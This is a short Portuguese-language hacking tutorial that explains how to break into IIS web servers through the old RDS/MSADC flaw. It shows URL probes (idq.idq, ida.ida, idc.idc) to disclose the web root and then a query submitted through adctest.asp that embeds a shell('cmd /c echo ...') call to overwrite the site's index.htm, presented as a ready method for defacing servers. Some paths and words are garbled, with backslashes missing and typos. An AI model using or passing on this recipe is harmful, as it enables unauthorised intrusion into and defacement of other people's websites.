Invadindo por RDS
Tutorial
Primeiramente vamos procurar a página que se encontra a index ou a default, na maioria dos casos só precisa digitar:
Citação:
wwww.servidor.com/idq.idq
Que aparece o diretorio, o mais comum é o InetPubwwwroot.
Para isso digite na URL:
Citação:
www.servidor.com/idq.idq
ou
ida.ida
ou
idc.idc
Você vai encontrar o diretorio como dito anteriormente, agora vamos a descoberta proposta acima.
Você só encontra ela fazendo testes assim:
Citação:
www.servidor.com/index.extenções possiveis
ou
www.servidor.com/default.exetenções possiveis
Citação:
www.servidor.com/msadc/samples/adctest.asp
Apague tudo que estiver escrito e digite:
Citação:
Select * from Products where ProductType=’|shell(“cmd /c echo (O QUE QUER QUE APAREÇA NO SEU HACKED) > c:InetPubwwwrootindex.htm”)|’
Agora é so apertar RUN que o servidor estará invadido.